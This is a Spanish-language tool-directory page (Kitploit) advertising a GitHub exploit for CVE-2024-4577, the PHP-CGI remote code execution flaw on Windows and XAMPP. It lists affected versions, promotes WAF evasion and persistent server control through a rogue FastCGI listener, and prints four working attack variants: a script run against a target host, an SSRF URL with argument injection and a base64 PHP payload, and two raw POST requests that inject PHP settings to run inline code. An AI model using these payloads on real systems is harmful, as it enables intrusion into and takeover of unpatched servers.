Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de Penetración
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

Exploit para CVE-2024-4577 PHP-CGI RCE en Windows, con omisión de WAF y soporte SSRF. Proporciona múltiples variantes de exploit para escenarios predeterminados, WAF y SSRF.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
65hace 2 añosAún no revisado
Compartir

CVE-2024-4577-PHP-RCE

Resumen y Principio del Proyecto

  • El primer exploit del mundo para la vulnerabilidad CVE-2024-4577 PHP-CGI RCE que utiliza el entorno PHP predeterminado (XAMPP).
  • El primer exploit del mundo CVE-2024-4577 PHP-CGI RCE que utiliza el entorno PHP predeterminado. Comparte el exploit original, admite SSRF, admite bypass de WAF.
  • Logra RCE en el entorno PHP predeterminado. Principio: cgi.force_redirect + REDIRECT-STATUS.
  • Nuevo exploit original que admite bypass de WAF. Principio: establecer un servidor FastCGI + comunicación mediante protocolo FastCGI.
  • Nuevo exploit original que admite el escenario SSRF. Principio: protocolo data:// + solicitud GET.

Ventajas de EXP 1

  • No necesita allow_url_include, auto_prepend_file, auto_append_file para lograr RCE. Puede incluir cualquier archivo y archivo PHP.
  • No aparecen las palabras clave que WAF intercepta con frecuencia: allow_url_include, auto_prepend_file, auto_append_file.
  • Todas las comunicaciones del servidor FastCGI no serán registradas por el WAF.
  • Escucha en un nuevo puerto, logrando así un control persistente del servidor PHP, independiente de Apache y PHP.

Resumen de la Vulnerabilidad

InformaciónContenido
Nombre de la vulnerabilidadPHP RCE
ID de vulnerabilidadCVE-2024-4577
Nivel de riesgoAlto
Tipo de vulnerabilidadRCE
Dificultad de explotaciónBajo

Versiones Afectadas

  • PHP (versión Windows) 8.3.0 <= versión < 8.3.8
  • PHP (versión Windows) 8.2.0 <= versión < 8.2.20
  • PHP (versión Windows) 8.1.0 <= versión < 8.1.29
  • PHP (versión Windows) versión == 8.0.x
  • PHP (versión Windows) versión == 7.x
  • PHP (versión Windows) versión == 5.x
  • XAMPP (versión Windows) 8.2.0 <= versión <= 8.2.12
  • XAMPP (versión Windows) 8.1.0 <= versión <= 8.1.25
  • XAMPP (versión Windows) versión == 8.0.x
  • XAMPP (versión Windows) versión == 7.x
  • XAMPP (versión Windows) versión == 5.x

EXP 1

Se puede utilizar en escenarios de bypass de WAF + escenario predeterminado:

python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

Por ejemplo:

python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

Se puede utilizar en escenarios SSRF + escenario predeterminado:

http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

Se puede utilizar en escenario predeterminado:

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

Se puede utilizar en escenario predeterminado:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

Reproducción

  1. Entorno del servidor:
XAMPP Windows versión 8.2.12
  1. Descargar e instalar XAMPP en el servidor:
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

O elija una versión afectada desde: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. Configuración del servidor
No requiere ninguna modificación, mantener la configuración predeterminada
  1. Usar el exploit en el cliente
Probar con los exploits anteriores
  1. Verificación
Observar si se devuelve la cadena "TesT" o el contenido del archivo system.ini del servidor
Descargar herramienta